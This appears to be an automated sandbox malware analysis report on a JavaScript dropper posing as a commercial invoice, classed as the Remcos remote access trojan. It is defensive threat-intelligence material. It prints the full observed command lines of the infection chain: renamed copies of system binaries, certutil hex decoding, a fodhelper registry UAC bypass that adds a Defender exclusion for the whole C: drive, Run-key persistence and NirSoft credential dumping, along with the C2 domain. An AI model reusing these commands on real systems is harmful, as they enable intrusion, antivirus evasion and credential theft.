Malware Analysis Report

2024-12-07 22:44

Sample ID 240718-27hfpsvapd
Target commercial invoice.js
SHA256 dc9834a7967c856395ccc15358635e9cb6fc59e7f2dc2f9f58a9f2e26b717ed5
Tags
execution remcos july 18- yak- uju collection persistence rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dc9834a7967c856395ccc15358635e9cb6fc59e7f2dc2f9f58a9f2e26b717ed5

Threat Level: Known bad

The file commercial invoice.js was found to be: Known bad.

Malicious Activity Summary

execution remcos july 18- yak- uju collection persistence rat spyware stealer

Remcos

NirSoft WebBrowserPassView

NirSoft MailPassView

Detected Nirsoft tools

Blocklisted process makes network request

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

Enumerates physical storage devices

Command and Scripting Interpreter: JavaScript

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Kills process with taskkill

Modifies registry class

Script User-Agent

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-18 23:13

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-18 23:13

Reported

2024-07-18 23:16

Platform

win7-20240705-en

Max time kernel

145s

Max time network

151s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\commercial invoice.js"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Public\alpha.exe N/A
N/A N/A C:\Users\Public\alpha.exe N/A
N/A N/A C:\Users\Public\kn.exe N/A
N/A N/A C:\Users\Public\alpha.exe N/A
N/A N/A C:\Users\Public\kn.exe N/A
N/A N/A C:\Users\Public\Libraries\CLEAN.COM N/A
N/A N/A C:\Users\Public\alpha.exe N/A
N/A N/A C:\Users\Public\alpha.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Public\alpha.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Public\Libraries\CLEAN.COM N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1432 wrote to memory of 1884 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1432 wrote to memory of 1884 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1432 wrote to memory of 1884 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1884 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 1884 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 1884 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 1884 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2820 wrote to memory of 2652 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2820 wrote to memory of 2652 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2820 wrote to memory of 2652 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 1884 wrote to memory of 2672 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 2672 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 2672 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2672 wrote to memory of 2728 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2672 wrote to memory of 2728 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2672 wrote to memory of 2728 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 1884 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2476 wrote to memory of 2692 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2476 wrote to memory of 2692 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2476 wrote to memory of 2692 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 1884 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\CLEAN.COM
PID 1884 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\CLEAN.COM
PID 1884 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\CLEAN.COM
PID 1884 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\CLEAN.COM
PID 1884 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 1112 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 1112 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 1112 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\commercial invoice.js"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "

C:\Windows\System32\extrac32.exe

C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "C:\\Users\\Public\\CLEAN.GIF" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "C:\\Users\\Public\\CLEAN.GIF" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12

C:\Users\Public\Libraries\CLEAN.COM

C:\Users\Public\Libraries\CLEAN.COM

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S

Network

Country Destination Domain Proto
US 8.8.8.8:53 madibarohillafour.duckdns.org udp
US 191.101.130.5:80 madibarohillafour.duckdns.org tcp
US 8.8.8.8:53 madibarohillafour.duckdns.org udp
US 191.101.130.5:80 madibarohillafour.duckdns.org tcp
US 191.101.130.5:80 madibarohillafour.duckdns.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat

MD5 e738497b75feb03a11e7b7e763f51037
SHA1 08c5205a67595a5c9e29341d03b6b66da96528e1
SHA256 897173be3c5e872e2d8560f8df743f93c8eb857f8d2d22d3196343c35e90abac
SHA512 3f1812c950e37b3048209e2abdecdfd40650541eefe9722f35771e7fc5723f409dbcffff7325421418948666c312165fa3f182ab3eb5fa442bbee46cb43118bc

C:\Users\Public\alpha.exe

MD5 5746bd7e255dd6a8afa06f7c42c1ba41
SHA1 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256 db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA512 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

\Users\Public\kn.exe

MD5 ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1 ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA256 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA512 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

C:\Users\Public\CLEAN.GIF

MD5 7b55805a9a2ffab38db59819b5c5c274
SHA1 65996c765dfc6a7665c8835edbf1bc4e7a1c9502
SHA256 50a94c852a9b0ba9f6ca217dfa79652b48a2ac41fe2b4578faad2e8e4a95800a
SHA512 3ac6a88d062cb076feb0b3397d12c61b8575763c9bb245d92b2d0b44b10451948a1d284244870c23e4e104575f3ccd09e0e0c7ee43e888a13f384ef1444fa2fb

C:\Users\Public\Libraries\CLEAN.COM

MD5 beacddde34cecf28562a676b781d71e4
SHA1 58ee38081e67d99f494248d682ce907921b1e020
SHA256 80091724af78d5cfdcb8a3a57eaf479f2a49b3479d69e4043a4bef74d0f5ae0b
SHA512 75df3ece32221eea5ec75ec5ff58d9484f6d317c2a55a04fb811a4f25409fd1761077df8e920dd683b9f3d37233f6d1e21e3e06e2a47a6539625d23ae05c83b1

memory/768-39-0x0000000000400000-0x00000000004F8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-18 23:13

Reported

2024-07-18 23:16

Platform

win10v2004-20240709-en

Max time kernel

149s

Max time network

145s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\commercial invoice.js"

Signatures

Remcos

rat remcos

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation C:\Users\Public\Libraries\nasppvoG.pif N/A
Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation C:\Windows \System32\per.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Public\Libraries\CLEAN.COM N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Govppsan = "C:\\Users\\Public\\Govppsan.url" C:\Users\Public\Libraries\CLEAN.COM N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1328 set thread context of 3556 N/A C:\Users\Public\Libraries\CLEAN.COM C:\Users\Public\Libraries\nasppvoG.pif
PID 1328 set thread context of 2340 N/A C:\Users\Public\Libraries\CLEAN.COM C:\Users\Public\Libraries\CLEAN.COM
PID 1328 set thread context of 4616 N/A C:\Users\Public\Libraries\CLEAN.COM C:\Users\Public\Libraries\CLEAN.COM
PID 1328 set thread context of 1476 N/A C:\Users\Public\Libraries\CLEAN.COM C:\Users\Public\Libraries\CLEAN.COM

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell C:\Users\Public\ger.exe N/A
Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open C:\Users\Public\ger.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" C:\Users\Public\ger.exe N/A
Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command C:\Users\Public\ger.exe N/A
Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings C:\Users\Public\ger.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Public\Libraries\CLEAN.COM N/A
N/A N/A C:\Users\Public\Libraries\CLEAN.COM N/A
N/A N/A C:\Users\Public\Libraries\CLEAN.COM N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Public\xkn.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\Libraries\CLEAN.COM N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4336 wrote to memory of 4024 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 4336 wrote to memory of 4024 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 4024 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 4024 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 4024 wrote to memory of 4332 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4024 wrote to memory of 4332 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4332 wrote to memory of 1420 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 4332 wrote to memory of 1420 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 4024 wrote to memory of 1092 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4024 wrote to memory of 1092 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1092 wrote to memory of 2868 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 1092 wrote to memory of 2868 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 4024 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4024 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1524 wrote to memory of 1556 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 1524 wrote to memory of 1556 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 4024 wrote to memory of 1328 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\CLEAN.COM
PID 4024 wrote to memory of 1328 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\CLEAN.COM
PID 4024 wrote to memory of 1328 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\CLEAN.COM
PID 4024 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4024 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4024 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4024 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1328 wrote to memory of 3556 N/A C:\Users\Public\Libraries\CLEAN.COM C:\Users\Public\Libraries\nasppvoG.pif
PID 1328 wrote to memory of 3556 N/A C:\Users\Public\Libraries\CLEAN.COM C:\Users\Public\Libraries\nasppvoG.pif
PID 1328 wrote to memory of 3556 N/A C:\Users\Public\Libraries\CLEAN.COM C:\Users\Public\Libraries\nasppvoG.pif
PID 1328 wrote to memory of 3556 N/A C:\Users\Public\Libraries\CLEAN.COM C:\Users\Public\Libraries\nasppvoG.pif
PID 1328 wrote to memory of 3556 N/A C:\Users\Public\Libraries\CLEAN.COM C:\Users\Public\Libraries\nasppvoG.pif
PID 3556 wrote to memory of 1540 N/A C:\Users\Public\Libraries\nasppvoG.pif C:\Windows\system32\cmd.exe
PID 3556 wrote to memory of 1540 N/A C:\Users\Public\Libraries\nasppvoG.pif C:\Windows\system32\cmd.exe
PID 1540 wrote to memory of 4648 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 1540 wrote to memory of 4648 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 1540 wrote to memory of 5008 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 5008 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 2740 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 2740 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 4296 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 4296 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4296 wrote to memory of 5032 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 4296 wrote to memory of 5032 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 1540 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2424 wrote to memory of 3344 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2424 wrote to memory of 3344 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 1540 wrote to memory of 2052 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 2052 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2052 wrote to memory of 2108 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2052 wrote to memory of 2108 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 1540 wrote to memory of 8 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 8 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 8 wrote to memory of 1476 N/A C:\Users\Public\alpha.exe C:\Users\Public\xkn.exe
PID 8 wrote to memory of 1476 N/A C:\Users\Public\alpha.exe C:\Users\Public\xkn.exe
PID 1476 wrote to memory of 456 N/A C:\Users\Public\xkn.exe C:\Users\Public\alpha.exe
PID 1476 wrote to memory of 456 N/A C:\Users\Public\xkn.exe C:\Users\Public\alpha.exe
PID 456 wrote to memory of 1220 N/A C:\Users\Public\alpha.exe C:\Users\Public\ger.exe
PID 456 wrote to memory of 1220 N/A C:\Users\Public\alpha.exe C:\Users\Public\ger.exe
PID 1540 wrote to memory of 4164 N/A C:\Windows\system32\cmd.exe C:\Windows \System32\per.exe
PID 1540 wrote to memory of 4164 N/A C:\Windows\system32\cmd.exe C:\Windows \System32\per.exe
PID 1540 wrote to memory of 2772 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 2772 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2772 wrote to memory of 2072 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 2772 wrote to memory of 2072 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 1540 wrote to memory of 3880 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 3880 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\commercial invoice.js"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "

C:\Windows\System32\extrac32.exe

C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "C:\\Users\\Public\\CLEAN.GIF" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "C:\\Users\\Public\\CLEAN.GIF" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12

C:\Users\Public\Libraries\CLEAN.COM

C:\Users\Public\Libraries\CLEAN.COM

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S

C:\Users\Public\Libraries\nasppvoG.pif

C:\Users\Public\Libraries\nasppvoG.pif

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1D28.tmp\1D29.tmp\1D2A.bat C:\Users\Public\Libraries\nasppvoG.pif"

C:\Windows\System32\extrac32.exe

C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "

C:\Users\Public\xkn.exe

C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "

C:\Users\Public\alpha.exe

"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""

C:\Users\Public\ger.exe

C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""

C:\Windows \System32\per.exe

"C:\\Windows \\System32\\per.exe"

C:\Windows\system32\SystemSettingsAdminFlows.exe

"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettings.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S

C:\Windows\SysWOW64\extrac32.exe

C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\CLEAN.COM C:\\Users\\Public\\Libraries\\Govppsan.PIF

C:\Users\Public\Libraries\CLEAN.COM

C:\Users\Public\Libraries\CLEAN.COM /stext "C:\Users\Admin\AppData\Local\Temp\rrzifaienneuhgtllgiwfpebmdzeowfu"

C:\Users\Public\Libraries\CLEAN.COM

C:\Users\Public\Libraries\CLEAN.COM /stext "C:\Users\Admin\AppData\Local\Temp\btesg"

C:\Users\Public\Libraries\CLEAN.COM

C:\Users\Public\Libraries\CLEAN.COM /stext "C:\Users\Admin\AppData\Local\Temp\mnrlhdez"

Network

Country Destination Domain Proto
US 8.8.8.8:53 madibarohillafour.duckdns.org udp
US 191.101.130.5:80 madibarohillafour.duckdns.org tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 5.130.101.191.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
